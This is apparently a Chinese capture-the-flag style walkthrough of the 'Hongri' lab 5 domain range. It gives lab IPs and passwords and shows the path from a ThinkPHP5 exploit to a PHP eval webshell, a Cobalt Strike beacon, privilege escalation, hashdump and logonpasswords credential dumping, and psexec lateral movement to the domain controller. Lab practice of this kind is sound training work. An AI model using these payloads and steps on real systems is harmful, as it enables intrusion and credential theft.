红日靶场5

网络环境

kali攻击机：

ip为192.168.1.128

靶机win7：

本地管理员用户leo\123.com

域管sun\Administrator dc123.com 改为 20121225Qnmxa@

ip为192.168.1.136和192.168.138.138

靶机win2008：

账号sun\admin 2020.com改为20121225Qnmxa@

ip为192.168.138.138

在win7上打开phpstudy，打开web环境

复现

使用arp-scan -l扫描内网存活主机

找到目标靶机为192.168.1.136

使用nmap进行扫描

nmap 192.168.1.136 -T4 -A -sV

发现了80端口，先访问下

发现为TP5，直接用工具打

可以执行命令，直接写入一句话木马

echo <?php @eval($_POST['cmd'])?> > shell.php

直接用蚁剑连接，然后对目标进行信息搜集

发现有两个网段，一个是1段，另一个是138段，并且在域sun.com中，DNS服务器为192.168.138.138，基本上DNS服务器就是域控

话不多说，直接上CS，直接通过powershell命令上线

设置心跳时间为1秒：sleep 1

然后使用插件直接一键提权，比如梼杌、谢公子插件等，拿到一个system权限的会话

打开system权限的会话，查看防火墙情况

shell netsh firewall show state

是关着的，我手动把它关了

查看域内计算机列表：net view

返现主机DC和WIN7

查看域控列表：net dclist

查看本机用户列表

有3个用户

接下来抓hash：hashdump

抓密码：logonpassword

然后通过“视图”-“密码凭证”查看抓到的密码

点击“视图”-“目标列表”

直接使用psexec配合SMB监听器上线DC机器

拿到了DC的beacon